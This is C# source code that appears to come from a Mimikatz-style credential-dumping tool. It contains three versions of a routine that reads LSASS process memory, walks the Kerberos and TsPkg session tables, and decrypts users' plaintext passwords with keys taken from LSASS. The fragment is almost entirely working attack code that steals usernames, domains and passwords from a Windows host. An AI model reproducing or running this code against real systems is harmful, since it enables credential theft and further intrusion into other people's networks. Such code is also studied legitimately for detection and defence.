private static void WalkAVLTables(ref IntPtr hLsass, IntPtr pElement, List <KerberosLogonItem> klogonlist, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist)
{
if (pElement == IntPtr.Zero)
{
return;
}
byte[] entryBytes = Utility.ReadFromLsass(ref hLsass, pElement, Marshal.SizeOf(typeof(RTL_AVL_TABLE)));
RTL_AVL_TABLE entry = Utility.ReadStruct <RTL_AVL_TABLE>(entryBytes);
if (entry.OrderedPointer != IntPtr.Zero)
{
byte[] krbrLogonSessionBytes = Utility.ReadFromLsass(ref hLsass, entry.OrderedPointer, oshelper.LogonSessionTypeSize);
KerberosLogonItem item = new KerberosLogonItem();
item.LogonSessionAddress = entry.OrderedPointer;
item.LogonSessionBytes = krbrLogonSessionBytes;
klogonlist.Add(item);
}
if (entry.BalancedRoot.RightChild != IntPtr.Zero)
{
WalkAVLTables(ref hLsass, entry.BalancedRoot.RightChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist);
}
if (entry.BalancedRoot.LeftChild != IntPtr.Zero)
{
WalkAVLTables(ref hLsass, entry.BalancedRoot.LeftChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist);
}
}
private static void WalkAVLTables(ref IntPtr hLsass, IntPtr pElement, List <byte[]> klogonlist, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist)
{
if (pElement == null)
{
return;
}
byte[] entryBytes = Utility.ReadFromLsass(ref hLsass, pElement, Convert.ToUInt64(Marshal.SizeOf(typeof(RTL_AVL_TABLE))));
RTL_AVL_TABLE entry = Utility.ReadStruct <RTL_AVL_TABLE>(entryBytes);
if (entry.OrderedPointer != IntPtr.Zero)
{
byte[] krbrLogonSessionBytes = Utility.ReadFromLsass(ref hLsass, entry.OrderedPointer, Convert.ToUInt64(oshelper.LogonSessionTypeSize));
klogonlist.Add(krbrLogonSessionBytes);
}
if (entry.BalancedRoot.RightChild != IntPtr.Zero)
{
WalkAVLTables(ref hLsass, entry.BalancedRoot.RightChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist);
}
if (entry.BalancedRoot.LeftChild != IntPtr.Zero)
{
WalkAVLTables(ref hLsass, entry.BalancedRoot.LeftChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist);
}
}
private static void WalkAVLTables(ref IntPtr hLsass, IntPtr pElement, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist)
{
if (pElement == null)
{
return;
}
byte[] entryBytes = Utility.ReadFromLsass(ref hLsass, pElement, Convert.ToUInt64(Marshal.SizeOf(typeof(RTL_AVL_TABLE))));
RTL_AVL_TABLE entry = Utility.ReadStruct <RTL_AVL_TABLE>(entryBytes);
if (entry.OrderedPointer != IntPtr.Zero)
{
byte[] krbrLogonSessionBytes = Utility.ReadFromLsass(ref hLsass, entry.OrderedPointer, Convert.ToUInt64(Marshal.SizeOf(oshelper.TSCredType)));
LUID luid = Utility.ReadStruct <LUID>(Utility.GetBytes(krbrLogonSessionBytes, oshelper.TSCredLocallyUniqueIdentifierOffset, Marshal.SizeOf(typeof(LUID))));
long pCredAddr = BitConverter.ToInt64(krbrLogonSessionBytes, oshelper.TSCredOffset);
byte[] pCredBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(pCredAddr), Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_TS_PRIMARY_CREDENTIAL))));
KIWI_TS_PRIMARY_CREDENTIAL pCred = Utility.ReadStruct <KIWI_TS_PRIMARY_CREDENTIAL>(pCredBytes);
UNICODE_STRING usUserName = pCred.credentials.UserName;
UNICODE_STRING usDomain = pCred.credentials.Domaine;
UNICODE_STRING usPassword = pCred.credentials.Password;
string username = Utility.ExtractUnicodeStringString(hLsass, usUserName);
string domain = Utility.ExtractUnicodeStringString(hLsass, usDomain);
byte[] msvPasswordBytes = Utility.ReadFromLsass(ref hLsass, usPassword.Buffer, (ulong)usPassword.MaximumLength);
byte[] msvDecryptedPasswordBytes = BCrypt.DecryptCredentials(msvPasswordBytes, iv, aeskey, deskey);
string passDecrypted = "";
UnicodeEncoding encoder = new UnicodeEncoding(false, false, true);
try
{
passDecrypted = encoder.GetString(msvDecryptedPasswordBytes);
}
catch (Exception)
{
passDecrypted = Utility.PrintHexBytes(msvDecryptedPasswordBytes);
}
if (!string.IsNullOrEmpty(username) && username.Length > 1)
{
Credential.Tspkg krbrentry = new Credential.Tspkg();
if (!string.IsNullOrEmpty(username))
{
krbrentry.UserName = username;
}
else
{
krbrentry.UserName = "******";
}
if (!string.IsNullOrEmpty(domain))
{
krbrentry.DomainName = domain;
}
else
{
krbrentry.DomainName = "[NULL]";
}
// Check if password is present
if (!string.IsNullOrEmpty(passDecrypted))
{
krbrentry.Password = passDecrypted;
}
else
{
krbrentry.Password = "******";
}
Logon currentlogon = logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
if (currentlogon == null)
{
currentlogon = new Logon(luid);
currentlogon.UserName = username;
currentlogon.Tspkg = krbrentry;
logonlist.Add(currentlogon);
}
else
{
currentlogon.Tspkg = krbrentry;
}
}
}
if (entry.BalancedRoot.RightChild != IntPtr.Zero)
{
WalkAVLTables(ref hLsass, entry.BalancedRoot.RightChild, oshelper, iv, aeskey, deskey, logonlist);
}
if (entry.BalancedRoot.LeftChild != IntPtr.Zero)
{
WalkAVLTables(ref hLsass, entry.BalancedRoot.LeftChild, oshelper, iv, aeskey, deskey, logonlist);
}
}
